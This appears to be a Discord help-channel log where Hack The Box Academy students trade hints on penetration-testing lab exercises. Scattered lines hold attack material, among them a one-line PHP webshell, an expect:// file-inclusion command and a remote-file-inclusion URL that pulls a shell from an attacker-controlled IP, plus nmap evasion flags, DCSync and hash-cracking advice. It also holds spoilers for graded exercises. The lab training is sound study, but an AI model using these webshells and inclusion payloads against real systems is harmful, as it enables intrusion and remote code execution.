you can also do sudo killall openvpn to make sure all processes are terminated for it

ive tried to use the expect wrapper as they said in the module and it hasnt been working

the server is just fed up "not not them again"

curl -s "server:port/index.php?language=expect://id"

did you replace <id> with an actual value? idk what it's expecting tbh

i haven't done this module myself

well its supposed to be an rce , so id should show me the user's permissions

such as uid, groups etc.. ive tried other commands aswell. such as ls, basic stuff really and it doesnt work for me

Haha yup, haven't you heard of that one? Jokes aside, restarting VM did the magic,

for the web part of the course, I'm not sure all of the techniques explained are working.. if i remember correctly, it was not like the other enum, AD sections etc. where we could try all the course content

i mean

it should i guess, it followed the configuration necessairy for it to work, and ran it with it and seems like the config was ready for it

with extensions=expect , being set for the expect wrapper to be used. so im baffled

yeah maybe this is just me, i don't know, i remember at the start of that web part, trying to make everything work and spending time on it, to finally realize some things just did not work but i was able to complete the exercises with other techniques from the course.

well i am at that part to be honest 😂 , ive finished the section already used the other wrappers to gain rce, ive did it and it worked fine

just this part hasnt worked and it grinds my gears

alr

i'll tell u the result

yeah, i get that as well,,, i quickly tried here and same results as yours

oh lol

@next bronze it worked, sudo nmap -sUV --disable-arp-ping -Pn -n --source-port 53 -p 53 10.129.2.48 --script dns-nsid

but are there other questions that work like this? i dont wanna use pwnbox, im comfortable with using my host machine

few and far between

hey guys, any hints for Skill-assesment of Broken Authentication?

How can I trigger a php reverse shell which I have uploaded to a webserver, through a FTP server?

I can access the .php file on the HTTPS site, but when I do so, the webserver serves the file for download and is not running the php code.

call it?

i assume the webapp resources or someof them are stored there, and it calls them from the ftp server, i presume if u go to the directory through the url u might be able to activate the rev shell

then it's likely you either A: placed it in the wrong place or B: don't have the listener running to catch it

c: looking for it in the wrong place? @fathom pendant

you replied to the wrong person

btw

ye i noticed

anyway no idea

there's a couple ways to do the easy skill assessment

Listener is running and ip is set to tun 0. Ports are matching. Not sure where else to place the revshell other than / as with the other files

that might be useful to place it there at the webroot

Yup but already there

you can also search for vulnerabilities

Me?

i believe the documentation explicitly states C*FTP

look for an idor first and try to maximize the info u got from it to the max, u can use intruder or make a script that goes per user etc, make sure to look thoroughly through all of the users one will stand out.

Something like that - I just find it way out of context considering the material in the room

i dont wanna spoil it for you

sometimes you need to do extra research outside of what htb teaches you

htb teaches you how to also look for info

not just "well it wasn't taught explicitly"

either way FTP isn't the only way forward

but also @stark lark reverse shells aren't always necessary

try just a basic php webshell

<?php system($_GET['c']); ?>

Yes that is what I'm currently trying

well are you specifying .../file.php?c=<command>?

Sorry.. That is what I will try now after the regular php rev shell

stop trying for a rev shell :)

you won't always be able to get a rev shell; and shouldn't be your sole focus

Was just the first thing that came to mind

When I figured I was able to upload and access it through the webserver

you won't know a revshell would work if you can't get a basic webshell to work/test

always start with the basics

"can I get it to run a command?"

also if your revshell syntax is for linux, it's not gonna work

the host is not linux

what were the lessons learned from the previous adventure in brute forcing? : D

This also downloads the shell2.php file

why are you using //?

also:

STOP GOING FOR REVSHELL

i literally gave you a simple webshell syntax

i will say it one more time: REVSHELL NO

wdym?

means it's not often

oh

okay

forgot the ; after the system($_GET[]); btw

why do u have // over there?

shouldnt be a single /

i literally already called that out

dont hit me

no need to be violent 🫣

anyone to help on the Skills Assessment for the module Intro to C2 Operations with Sliver? i know what to do it just wont work idk really know why.

No clue was on laptop so I couldnt see

i mean you didn't look at the url you were trying to access?

So like this?

also: http:// not https://

No clue why, but it seems that the files arent on port 80.. only 443

weird

oh yeah the ftp server is running on https

but yeah the issue is that you need to upload the file to the actual base webserver

as the 443/https is running a fileserver

so it's not going to run the file; just serve it

Hmm not sure if I'm even on the right track then

you're thinking almost correctly; the FTP service though has a glaring vulnerability if you search for it

Tuple?? but say1ng worng/

pyhton module

as I stated though; FTP is only one of the paths forward

what section?

Thought of doing it like this #modules message

Managing Libraries in Python (Continued) last one

that could be a way forward (but make sure you have the \ facing the right way, or doubled up)

the question wants the whole output <class 'type'>

Yup but sucks I wasn't able to do this lab myself..

because you're thinking in only one dimension

let me try

uploading to ftp only uploads to the ftp server

read the docs and see what service is running the FTP server

search that for an exploit

Don't think I've met such before where the ftp server is also https

well most servers now are https

it's just being hosted on an https server for file retrieval

¯_(ツ)_/¯

it's nothing crazy

usually the ftp server is on a separate server, but they can't set it up that way for these labs

so they separate http/https

Thanks

btw if you print(type(var)) <-- it'll print out the full thing that same way

<class 'type'>

was just guess1ng 😅

you shouldn't be guessing

the section tells you how to get the type of something

none of the modules, as far as I know, require you to guess

it's formatted in a way for you to follow along

Hi

or be within an interactive python env (usually typing python in your terminal)

I just started htb

w1ll try that aga1n

same

you don't need to replace your 'i's with 1s, it's kinda cringe bro

IIs any one named this so i can change if needed

read and follow #welcome so you can access more channels

I named myself this befor i joined

when you link your HTB account, it'll change your name to your htb username

this isn't a gen chat

Oh

this chat is for help with academy modules

Oh ok sorry

Gotcha. Should I be able to view the contents of flag.txt through the web shell?

if you upload it to the right place

again

let me spell it out for you

the SERVICE running FTP is vulnerable

Quick what in the world idis the clover thing

sorry hav1ng keyboard problem w1th some keys

discord thing denoting "new user"

get a new keyboard

Ah

Yeah

Bro now way same here

hey that's something

no need yet just have to replug just dont have screw now

Mine glithes althe time

Haha yes I know how to follow a guide.. But right now I cannot remember how to to it. I suppose something like more <flag path> but what about spaces etc?

red or blue???

you really don't have to worry about spaces

yes

wh1ch??

Yes?

yes

(it doesn't matter)

purple

???????(questions)????????

generally shouldn't be following a guide

matters for us b1gners to stay at s1ngle path

anyway @stark lark the windows find command is where

Thx! Figured the flag was somewhere easy - being the only thing easy for this lab

i suggest doing the intro to windows command line/intro to windows modules if you haven't done them already

usually is

1s there any module for revers1ng at acadmy?

not many

there's some binex modules

Thanks for the help and patience

Verification not working

message a mod see the members list for who's online

I type it in and says its to short

well are you on https://app.hackthebox.com/profile ?

woah

That was NOT me

Im fr

there's no account identifier for academy

i wasn't gonna say anything since it got autoyeeted

¯_(ツ)_/¯

Fr my keys repeatedly type on its own

p1ng mod there

?

Not just on discord bro

either way

back on point

where are you getting the account identifier from?

Uhh

...

it should be from the link in #welcome

???idk??

Oh.....

well then if you don't know then you didn't read

My bad

the instructions are literally there in plain english

Lol

congrats! that's curious, i did not get the same flag

Not working

he likely edited it

I gi e up

skill issue then

Give up

if you can't follow basic instructions

Bro what?

Htb issue

nah it's a you issue

How?

thought about it, but that's well done haha

other people have been able to identify just fine

Ops

Heya. currently working on Information Gathering - Web Edition>DNS Zone Transfers.

first question needs you to do a DNS zone transfer for inlanefreight.htb on a generated DNS, which is the 10.129.118.66 in my command. i basically did the same thing as in the example earlier in the page, but altered
Example: dig axfr @nsztm1.digi.ninja zonetransfer.me
Mine: dig axfr @10.129.118.66 inlanefreight.htb
it then throws this error 3 times and gives up:

;; no servers could be reached```

What am i doing wrong?

also, i'm assuming attempting zone transfers on a random DNS is illegal right? or at least not 100% legal

are you connected to the vpn?

ah i didn't know connecting to the vpn was required, will try that. thanks

sees internal/private IP
"Didn't know I needed to connect to VPN"

basic network info goes a long way

yeah fair. honestly didn't pay too much attention to what exactly the IP was. kinda tired and just trying to do one last chapter for the day

10.x.x.x is a private ip range

it doesn't help that a fair bit of this module is mixed public/private IP

information gathering module section web archives

i cannot view the 8th of august on waybackmachine

Bruh

in 2018

Please calm down

Ha I did this earlier today

Did you do hackthebox.eu?

Instead of hackthebox.com

it shouldnt be this difficult to do hackthebox lookup for the wayback

Bro for bug Bounty which box should I consider?

hackthebox wasn't .com back then

oh wait ur right actually

Hehehe

no boxes are gonna reliably help with Bug bounty

as the goal of bug bounties and the goal of boxes are different

You mean i don't get boxes for bb in htb?

bb isn't about the same thing as boxes

Boxes are more penetration testing

I'm confused now!
I thought htb will help for bb not acedmy
So I brought monthly subscription

Academy and the CBBH track help with BB. If you want more BB stuff on HTB, look at the challenges

Specifically Web, probably

So there's no dedicated boxes for bb in htb right
I need to search for myself? Isn't

i think you're not reading carefully enough:
HTB has challenges - those will be closer to bug bounty than boxes
From there you can also do Portswigger as extra practice

challenges have categories like "web, binex, reversing" to give you a rough idea of the skill needed to get the flag

the goal of boxes, however, is to get full root of a box

Yeah bro I'm getting now

in bug bounty, you don't want root

because getting root == you can be in legal trouble

But the htb box will help a lot for bb right?

no

challenges will

lmao

challenges are a separate part of the main platform

The htb.eu is shown in the picture in the course, they couldn’t give a better hint.

habits make you think .com

Where can I get these challenges bro?

yeah my bad on my end but with osint u have to look and read carefully

https://app.hackthebox.com/challenges?sort_type=asc

Thanks a lot bro❤️

Can you give some more info about this?

also verify your account following the instructions in #welcome

this isn't a channel for help with challenges/etc it's for htb academy

if you read and follow #welcome you'll be able to see more channels

In the "Footprinting IPMI" module of the pentester job path it says that we can abuse a flaw in RAKP in IPMI 2.0 to obtain password hashes for any user and crack them offline. It shows an example of using hashcat to crack the mask, and an example of retrieving the hash. Just to be clear, I'd take the hash I got from Metasploit (shown in a red rectangle in screenshot 2) and add it to "ipmi.txt" in the hashcat command (shown in a red rectangle in screenshot 1)?

do you want to an example of how to use hashcat to crack ipmi?

I'm asking if that's what's being demonstrated in the module since the Metasploit module appears to have cracked the hash all on its own any way so I'm not sure what's the need for hashcat.

Did you try with hashcat?

Don't use the mask

The mode is right, but the mask is explicitly for specific circumstances

https://tenor.com/view/sting-mask-unmask-removes-mask-gif-21742698

The sentence with it even says "in the event of HP iLO using factory default"

The example shows it being cracked because the hashed password is in the metasploit wordlist

Otherwise it gives you [user]:[pass]
If user is in the wordlist then it gives a username if not it gives the hashed username

man

Bro what happened

My account's mail was changed, so I deleted it.
But now waiting for mods to unlink the old acc.

It's Sunday so gotta have patience habibi

yea bro, Mr.K was in friendlist, 0day, szy, alot of staff.

all gone. 😢

Gg no re

?

hey @naive sage

whats up bro has heard that u got scammed by some sk1ds

Anyway not the place for idle chatting

^^^

Hey can anyone help me with the dc sync secrion in active directory module for cpts

Ive managed to rdp into the attacking machine from a windows box now i try to run secrets dump and all not working

what's the error say

Status locked out tto many login attemps

It means you got locked out

Reset the target and try again

reading tcp/ip illustrated but I wanted something more to supplement my reading.

Whats a good "guide" for modules you should start out with

There's not much to supplement stuff like that as it's stuff that you kinda get baked in your brain

Most stuff in hacking deals at the network/transport layer, with other protocols spanning from session to presentation

Anyone want to see Trumps Shooter death face ?

Not for this server my guy

Read #rules

lol

That's the rules bud, pg-13 server

Don't like it, leave

👌

oh so my book is great enough content wise to be read by itself

thats nice to know

Generally yes

id still like to apply what ive been learning though, or at least interact with it

TCP/IP and OSI are general theory

You don't need to dig into it unless you're a network architect. Aside from that, there's already programs built to interact with other layers

to my original question, where would a beginner start module wise?

Information Security Foundations path

Lays the groundwork for a lot of basic things you'll be expected to know

i deeply appreciate it

ill be on my way now

INFORMATION GATHERING - WEB EDITION

Section: Creepy Crawlies

After spidering inlanefreight.com, identify the location where future reports will be stored. Respond with the full domain, e.g., files.inlanefreight.com.

1. I crawled the website just like the module taught me.

• I crawled the website using everything; burpsuite crawler, zap spider, & the ReconSpider script demonstrated in the module.

2. I checked all URLs found and none of them are the answer or lead to the answer

Thanks for any help

Hey @fathom pendant can u help plz

why would info about future stuff be in a url? perhaps it's hiding in a comment

I checked all urls of the entire site for comments but there is nothing regarding future reports

i found it pretty easy with reconspider

¯_(ツ)_/¯

https://www.inlanefreight.com/wp-content/uploads/2020/09/goals.pdf

just run reconspider on inlanefreight.com

There is the uploads directory which includes reports such as the company goals in 2020

I did run it though

well you're missing something then

        "https://www.inlanefreight.com/index.php/about-us/",
        "https://www.inlanefreight.com/index.php/news/",
        "https://www.inlanefreight.com/#content",
        "https://www.inlanefreight.com/wp-content/uploads/2020/09/goals.pdf",
        "https://www.inlanefreight.com/index.php/about-us/#content",
        "https://www.inlanefreight.com/index.php/contact/#content",
        "https://www.inlanefreight.com/index.php/offices/",
        "https://www.themeansar.com",
        "https://www.inlanefreight.com/index.php/career/#content",
        "https://www.inlanefreight.com/index.php/news/#content",
        "https://www.inlanefreight.com/index.php/offices/#content",
        "https://www.inlanefreight.com",
        "https://www.inlanefreight.com/",
        "https://www.inlanefreight.com/index.php/career/",
        "https://www.inlanefreight.com/index.php/contact/"

it won't be in links

ReconSpider has a Comments field

cat Results.json | jq -r '.comments'

But mine doesn't

¯_(ツ)_/¯

it should

Thank you for that @fathom pendant I found it

you were just looking in the wrong spot

if you get domain admin, means you have local admin right over all computer too?

within the domain

okay thanks

we only need to bypass UAC when we are accessing the target via fully CLI?

I'm hitting a weird problem with the Gitlab section of Attacking Common Applications. Firefox gives me a 422 error when logging in with valid credentials to Gitlab, whereas Chromium logs in fine. There are comments in online forums suggesting that the problem is a lack of _gitlab_session cookie in FireFox. This is a problem with the suggested RCE script as I can't see any way of putting the cookie from Chromium into the script and so I just get a 422 error.
Does anyone have any ideas?

yes

On a technical level, being a domain admin gives you local admin powers on all domain-joined computers by default. it doesn't always grant you "local admin" privileges.

yep that is true, I've seen DA not have admin rights on specific hosts, it depends on the configurations

^ yup. by default yes, but can be configured otherwise.

i see thank you so much

I want to purchase htb academy silver teir subscription, do I buy it on hack the box?

do u have college id or school id?

Im a highschool student so my school isnt registered as eligible for academy tier subscriptions

bro use that id and get 8 dollar plan which covers everything

I dont have a school id

deeply unfourtunate

so what do u have?

you buy it on HTB academy website

but if you message support you can likely see if they can work you in for the student monthly

they've been known to get HS kids the discount

yay i did same

just gotta reach out

Im trying to do so, it doesn't direct me to another site

but ill try messaging support, thanks

?

https://academy.hackthebox.com/billing <--

"it doesn't direct you to another site" not sure what you mean by that lol ofc it won't redirect you off HTB

Site as in web page

Kinda messed that wording up

take it up with support ig ¯_(ツ)_/¯

only thing I can say is make sure you don't have adblock enabled

god damn it

im guessing thats why the target system wasnt spawning, I tried changing my vpn location to a different region and it ended my system

Im at free tier so It means I cant actually go through the module I was doing

that wouldn't mess with target spawning

just use your own vm

¯_(ツ)_/¯

if you have your own computer it's worth setting up your own vm

Hello,

I need a nudge with the Skills Assessment - File Upload Attacks Module. I understand that in order to get the full path, I need to figure out how the file I upload is renamed. However, although I am following the logic behind this, it simply does not seem to be working for me.

ill look into how id do that on mac os

UTM or Parallels

those are the best for Mac

parallels is subscription

didn't say free

Havent heard of utm though

:)

iirc Parrot has a UTM image, and Kali should have one as well

im guessing id make 2 vms? 1 with kali and one with whatever

actually id just need 1 as they provide me with a target system free of charge

i still need a windows vm to play steins gate vn, ahem

yeah

but you only need one vm

you don't need to use the instance if you use your own vm

just need the vpn

and you're good to go

Thanks

If still did't get

DM!

What's special reward when reach 30 streak point every week ?

Hey guys. Im currently going through the nmap module. There are some questions that require us to scan all ports. But whenever I try doing that the scan takes a ridiculous amount of time (>1hr). I checked this using the -v flag. I have tried different vpn servers and all of then results in the same issue. Anyone else experiencing the same thing?

nothing

so far

-T4

and maybe -sT to force it to do a TCP scan

I use nmap -v --min-rate 5000 'IP'

--min-rate 5000: This option sets the minimum packet sending rate to 5000 packets per second. This can speed up the scan but may also increase the likelihood of detection and blocking by firewalls or intrusion detection systems.

How about the firewall and ids/ips evasion hard lab? Ive used that method for one of the earlier tasks but for the hard lab i will get banned

Yeahhh i used that for the earlier one but now in the hard lab i cant really use that method

nmap -sS -p - -n -Pn -g 'IP' --disable-arp-ping

Thanks pal! Already solved it.

I am getting the same result when using the PowerView function Get-DomainTrust and Get-DomainTrustMapping. The reading in the section "Domain Trusts Primer" of module "ACTIVE DIRECTORY ENUMERATION & ATTACKS" shows that Get-DomainTrustMapping gives a little more information. Is there something I am missing or is this the expected behavior?

In this case thers not more info to give

no

not legal
and no one will help

Hey can someone help me with "attacking web application with ffuf - skill assessment" last question parameter value fuzzing .. I already got the parameter to fuzz but not able to find good word list to fuzz the value, I have already tried "xato-net-10-million-username" and got "Hxxxx, xxxxy,xxxxx" .. bt when I tried it with curl post request with no further sucess in obtaining flag.

in win privs kernel exploit, i tried to get met shell but failed, any tips

maybe recheck your curl request, from what you say you seem on the right path

Yes you were right I had a little typo in curl command.. and thanks for your response

nice! maybe delete the command you posted as they contain spoilers

Yeah sure

from just that screenshot as context, i would say try to check why you have those errors.

Hey @south glen I’m at the step find for the page should say ‘you dont have access ’ i wonder which directory list need to use for fuff wordlist. I’m using directories2.3 small

which CVE are you using?

Are you also encounter problems with htb machines? They are really slow.

Ive tried this and it still says it will take 2hrs using -v 😂

Any hints or resources for this assessment in Network Configuration section at Linux Fundamentals?

Got it success with combined_directories.txt from seclist

Hey

Could someone help me with the web attacks module?

I have found the user, who's administrator with the id 5*, but when I try to change the password I get Access Denied error

And also I tried using web tampering by trying to edit the details on api.php/user/7* but I couldn't change the company name

@left topaz
This part is broken on the target VM.
You need to change the ProcMon executable that Noriben uses so that it can save the CSV properly.
There is a Procmon64.exe file in Noriben-master. Open Noriben.py and scroll down to the config. Change the following so that it points to Procmon64.exe

o

any ideas on how to improve the performance of htb machines? 😄

guys

I started learning linux , any resources to enter ethical hacking

https://academy.hackthebox.com

nope but there shouldn't performance issues generally

which module are you having problems with

Web Enumeration & Exploitation. It takes like 5 min until a web page is loading.

is that a module?

Could someone help me? I’ve already get the IDOR, i changed the request to put, head and patch to reset.php and to api.php/user/**, sending it in the default format and in json and i get a “0” or a “1” in the answer, respectively, as well as “acess denied” and “missing parameters”. I would assume that the answer “1” would made the necessary changes to the admin user password, but no, the “1” is just the api answer. Any hint would be much appreciated. Thanks in advance

Attacking Enterprise Networks / Web Enumeration & Exploitation

it was fine when I did it

let me check

the point is, that some of the web apps are working fine, but some of them are really slow

tried a few and they all worked fine for me

on US5

I'm on EU, nvm, i will do it like this

Hey can someone help me with "attacking web application with ffuf - skill assessment" Trying to fuzz parameters, hard time on choosing correct wordlist tried burp parameters no luck any other suggestions?

have you got any of the tokens for the users? and enumerated which user id is admin?

Yes

if you have the token for admin, and user id, ||intercept the request and include the admin token in the request.||

I did it says accessed denied

You mean API.php/token/5*?

if you're using the admin token in the header's then it shouldnt

can't find my notes on this one .... but i remember being stuck for a while and ||it was including the token in the header of the reset.php (not just the username) ||that was the piece i was missing, as by default it wasn't include it (and therefore denying).

So you mean in the cookies??

maybe im thinking of a different assessment. but for 1 of them, ||you had to find the UID who was admin, and then find the token. and include that token (was different to the PHPSESSIONID)|| in the reset.php request.

It still doesn't work

Hi, I am doing "Attacking Domain Trusts - Child -> Parent Trusts - from Windows" section from "ACTIVE DIRECTORY ENUMERATION & ATTACKS" module. I am quite unable to grasp the concept of SID Filtering or why is it required.

1. Let's say we have domainA(source domain) with userA that needs to be migrated to domainB(destination domain).
2. After migration, a new user userB is created in domainB with a new sid and sidHistory set to the sid of userA in domainA.
3. When this user tries to access resources of domainA, they get the permission from sidHistory.

This is the desired behavior. Now why do we need SID Filtering? Where should this be enabled, on the source(domainA) or destination(domainB)? If this is enabled, wouldn't it disrupt the migration process?

I would appreciate pointers to reading materials that explain this as well.

The token is somethin

i used|| burp-parameter-names.txt f||rom seclists and|| usernames.txt ||

The token from api.php/token/5* ???

Thanks let me try that

no promises lol

i dont feel strong on web stuff. i need to circle back and maybe do some portswigger labs too lol

Another question that I have is, during migration of userA from domainA to domainB, what is the trust relationship like? Which domain trusts whom?

SID filtering is to control which type of SID are allowed and to manage the trust boundary types allowed, it affects more than just migration
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-pac/55fc19f2-55ba-4251-8a6a-103dd7c66280

Considering the scenario of migration, where should this be enabled, on the source(domainA) or destination(domainB)?

the domain with the ex-foreign principal, so the destination

once the domain is migrated the users will get a new SID within the domain they have migrated to

If I understand it correctly, we need to enable SID Filtering on domainB so that even if a user on domainA manages to get the SID of domain admin of domainB, they cannot do anything. But if we enable SID Filtering on domainA, then the just migrated user will not be able to access resources within domainA, which is not the desired behavior. So, we do no enable it on domainA(source).

<@&861185840277487616>

Bye have a great time

yep, basically with SID filtering, you cannot fake a ticket with the SID of a privileged group (let's say DA with RID of 512/519) of a another trusted domain and obtain DA privileges on the target domain

Could someone help??

which section?

Web attacks

hey, yes maybe, in absolute terms someone could. You already got help. Could you eventually try to be more precise in your questions, modules and section, give context, develop on what you tried, what did not work etc. wrap your command into backticks so it is readable without too much effort.

Here

on web attacks you have multiple sections, like idor, skill assessment etc.

Thanks for the help @sterile solstice

Skills Assessment

There is only one I guess

no problem. was i helpful? haha

try other http verbs, assuming the rest is correct as there is a few parameters that can mess things up

Yeah you were, I am the stupid one

I am still stuck

mate, im there with you. i occassionally get something right. glad i helped a bit though.

just post screenshot of your burp request, you can delete them later

still need help?

you are not stupid, you have to have the correct http verb, endpoint, uid and token. A lot can possibly go wrong or get mixed up

Yes.

I DMed you

i went around in circles with that one. took me ages to figure out how to get the token again once i enumerated the admin's UID lol. it was a 'simple' exercise but not always the easiest ....

Yes that's what I got

But I couldn't reset the password

Ik

It says access denied

yeah i remember it needed to be fairly organized in renaming the repeater tabs,

yup. and i took so long the target died, and when i reset it was all screwy. between burp retaining some cache for prior intercepts and not setting the target to the new IP, i was just having an aweful time lol.

haha same here,2h.... not enough but going from start helps with muscle memory though : )

yea i agree! part of why the modules are good, they force you to do and not just read text. but its super annoying when you're doing an assessment and the target dies...it happens too often with me lol

you need to make that UID a spoiler.

why would you do that, how is it helping in revealing everything ?
ok they get the flag but what will they learn

highlight the text and click the eye function. dont want to spoil it for others

just remove the obvious answers

well that too lol

@wraith pelican have you done the attacking common apps module yet? i had issues with the WP section. not doing it tonight but i may need some help tomorrow lol

yeah i've done the cpts path except reporting and aen... and yes glad to help if i can : )

https://academy.hackthebox.com/module/113/section/1100 for wordpress enum & discovery, are you only using wpscan? i never found the flag.txt from any of the enum features i used from wpscan.

it also wouldnt accept the plugin i found as well, which im pretty sure was the answer. spent hours googling and trying and got nothing for 1 of the first sections that has q's lol

Enumerate the host and find a flag.txt flag in an accessible directory. Look into the directories listed by wpscan.

let me check if i got something in my notes

and the plugin name is from 3 words with space between them like "word word word"

yea i thought it was ||contact form 7|| but it wont accept it and i ran wpscan a few times and got nothing

its not contact form 7

just use curl -s http://blog.inlanefreight.local/ | grep plugins

i guess i only used wpscan and manual enum. i see nothing much else in my notes

so that only returns ||contact form 7 and mail-masta ||

only 1 of those is a 3 word plugin which it would not accept as my answer lol

that's not it obviously : D

can you paste the result from curl here?

||

<link rel='stylesheet' id='contact-form-7-css'  href='http://blog.inlanefreight.local/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.4.2' type='text/css' media='all' />
<script type='text/javascript' src='http://blog.inlanefreight.local/wp-content/plugins/mail-masta/lib/subscriber.js?ver=5.8' id='subscriber-js-js'></script>
<script type='text/javascript' src='http://blog.inlanefreight.local/wp-content/plugins/mail-masta/lib/jquery.validationEngine-en.js?ver=5.8' id='validation-engine-en-js'></script>
<script type='text/javascript' src='http://blog.inlanefreight.local/wp-content/plugins/mail-masta/lib/jquery.validationEngine.js?ver=5.8' id='validation-engine-js'></script>
        <link rel='stylesheet' id='mm_frontend-css'  href='http://blog.inlanefreight.local/wp-content/plugins/mail-masta/lib/css/mm_frontend.css?ver=5.8' type='text/css' media='all' />
<script type='text/javascript' src='http://blog.inlanefreight.local/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.4.2' id='contact-form-7-js'></script>
```||

curl -s http://blog.inlanefreight.local/?p=1 | grep plugins

that was it....

thanks mate. it was such a simple exercise and it just wasnt working for me. it was very annoying. lol

https://academy.hackthebox.com/module/163/section/1544 Any ideas for "Use the XXE vulnerability to find a flag. Submit the flag value as your answer (flag format: HTB{}). "? I tried i think everything, including a reverse shell, but i can't find the path of the flag.

scanning through that page, that is well above me lol

aen, that's so forbidden, can't help, can't even look at it

i've heard so much about it. i feel like its going to crush my motivation to get certified lol!

haha yeah reading the cpts channel killed me

yea sometimes it motivates me and othertimes not so much...hahaha

i will likely skim parts of aen reading, but then go back through the modules from the beginning, and then tackle aen. will see.

life is in the way right now so i prob wont get to attacking common apps until later in the week/end. then its privesc, then aen. if i remember correctly.

that's what i'm doing at the moment, review all the course, notes etc with the impression i should upgrade my hard drive somehow because it seems new data keeps overwriting the old one : D

i just don't understand why it's not working when i try to get rev shell

haha. well fixing my notes is another thing too. also, when i did a few boxes this week i found myself not having a clear method. i need to work on my workflow. and i know its not necessary, but even going back to other modules like bash scripting, python for dns, etc., may help with my automation and help in the CPTS exam. though the InfoSec skill path is assumed knowledge. Will see. Im 75% through the path but this last 25% looks like it'll take ages.

I go back to foundation modules as well, there is plenty of stuff i forgot i got there. Regarding acquiring a method, i think, for me anyway, a good thing was to let the content rest down a bit after finishing, Then now reviewing all and trying to get a higher view makes things less overwhelming.

it says XXE wdym revshell

defnitely. believe it or not, i think the windows foundations/t1 is something i should go back to.

yea i agree. a method just comes with practice and planning. in any workplace, getting a method is often about feeling more comfortable about the subject/material/area and understanding those connections. the modules give us information, they can't tell us how we should go about organising ourselves in a pentest. at least IMO. doing those boxes helped me a lot though. a bit of practice from the modules.

you can just read the flag file with XXE

yeah, but where is the flag 😄

it will be likely in /flag.txt

the path 😀

???

it is the path wdym

yeah that's not because we read something once, we know it, at least not for me anyway. Plus the question/flag system gives a biased sense of completion. I watched recently this vid about osint methodology, i was kinda helpful because on a high level it is the same way of doing things, rinse and repeat, organisation, ask questions, question the questions etc
https://youtu.be/FCpJ9fFF84g

well i really want to get the OSINT module, even though its t4. i've done some OSINT previously and as far as specialties go, that's kinda where i want to focus.

there have been some OSINT conferences/forums that i tried to get my company to send me too. they didn't take. b*stards. hahaha. but when i get through more of CPTS i'm going to have a look at that OSINT module.

(thanks for the link. i've saved it to watch later)

haha same about osint module, it is generally an interesting topic. Also this post by blackhills infosec gives a bit of perspective. 5 years plan into infosec.. 5 years not 5 months : D
https://www.blackhillsinfosec.com/webcast-5-year-plan-infosec/

prob too much info now for the channel, mind if i DM?

Hi

<@&861185840277487616>

no, yes DM

Heya. need some help with Information Gathering - Web Edition > Virtual Hosts.
Might be a stupid question, but i'm still very new to this so go easy on me :)
I think it basically boils down to that i don't really understand what to do with "vHosts needed for these questions: inlanefreight.htb".

the first question is: Brute-force vhosts on the target system. What is the full subdomain that is prefixed with "web"? Answer using the full domain, e.g. "x.inlanefreight.htb"

I've tried a 2 things:

1. using gobuster in the same way as the example. The example gives you this: $ gobuster vhost -u http://<target_IP_address> -w <wordlist_file> --append-domain
   which is then used to scan for subdomains for inlanefreight.htb using this wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt (i also have this same wordlist in the same directory). their example then becomes $ gobuster vhost -u http://inlanefreight.htb:81 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain

when i try to run this same command in my terminal and it returned the same basic gobuster stuff with an error message instead of the normal output which i expected based on what i saw in the example: Error: error on running gobuster: unable to connect to http://inlanefreight.htb:81/: Get "http://inlanefreight.htb:81/": dial tcp: lookup inlanefreight.htb on 192.168.2.254:53: no such host

2. I also tried to solve the question through ZAP's Fuzzer. I noticed that when using the manual request editor it normally changes the Host header back to the IP that was generated for the exercise, but i was able to disable this. When using fuzzer to try the same wordlist as before to fuzz subdomains in the Host header it also does this though, but i was not able to find the option to disable this. so this didn't work either.

I'm not quite sure where to go from here. what am i doing wrong? i feel like i skipped an important step but have no clue what

add the hostname to /etc/hosts

If a virtual host does not have a DNS record, you can still access it by modifying the hosts file on your local machine. The hosts file allows you to map a domain name to an IP address manually, bypassing DNS resolution.

oh lmao why did i not think of that. I even read that line again but i guess it just didn't click
so i just add <generated IP> inlanefreight.htb to the file right?

yes, leave the port out tho

alright, thanks

stuff is working now. thanks for the help

In the File Uploads section, the XXE part under Limited File Uploads, only the first SVG upload actually changes. If I try to upload another, it doesn't update it. Is that a me issue? I have to restart the server, and then it works.

cam someone help me figure out why my webshell aint working

view-source:http://10.129.175.24/index.php?language=http://10.10.16.106:8000/shell.php?cmd=whoami the url used

<?php system($_GET["cmd"]); ?> the webshell

anyone?

well a server restart did the job

Hi please help I am very new here. It is very challenging for me at this moment. Even the OpenVPN is hard to connect. Anyone with a great heart please hear. 😦

I am in Windows Event Logs & Finding Evil - at the endpart i need to RDp to the target. I tried many things but it really does not connect.

please help 😦

hey, can you post the command you tried to rdp to the target? what error message to you have?

These are some of the errors in the log. before it was only one but now it multiplied. (congrats to me)

so basically why i did that is because, on the lab it says to RDP to the target. so for me to do that (this is what i believe i should do, or maybe im wrong) I downloaded the .ovpn file then install a open VPN client. Tried to run it but I got some errors. I did lots of things already but it is not working properly.

ok ok maybe let start at the beginning, are you using your own virtual machine or the pwnbox? Or your usual computer?

maybe, if you haven't done it, a good thing could be to start with the basic modules like "Information Security Foundations"path

Hi, I am doing the
Section: Attacking Domain Trusts - Child -> Parent Trusts - from Windows
Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS

I have RDP into the ACADEMY-EA-DC02 machine as user htb-student_adm which belongs to LOGISTICS\Domain Admins group. So, I am trying to perform DCSync to get the NT hash of krbtgt service account. But I get the following error:

are you running it as admin?

Oooooh

Is the server down for some reason

seems like it, i just tried again and its back up? for me at least

When running "Powershell as Admin", its working. What I don't understand is we are opening powershell in the context of htb-student_adm user who already belongs to Domain Admins group, so why is the error being thrown? I mean the user is already an administrator.

UAC, admin users have 2 tokens, one is the standard token, the other is the privileged token. when you run as admin and that prompt pops up it's using the privileged token

Hey, why can’t I access the platform?

Yuh

Is this with everyone

I can access academy but not normal HTB

Academy or Main Plattform?

app.

I can't access academy either :/

In the previous section of DCSync, it shows that we can use runas. I tried to do runas which opens a new session at C:\Windows\system32. But even it gives the same error, why?

I'm in now, he needs me to verify all the time

I'm still getting a 500 error when trying to login

im in now

man some modules are just bad

cbbh

If you have suggestions for improvement, use /feedback

✅

runas is still restricted by UAC

Are there any players from other regions? Every time I connect to VPN or VNC, it is very laggy. I would like to ask you for your solution.

Just finish skill assessment for ADCS Attack but there's something I'm not sure about, can I DM anyone for explanation ?

sure

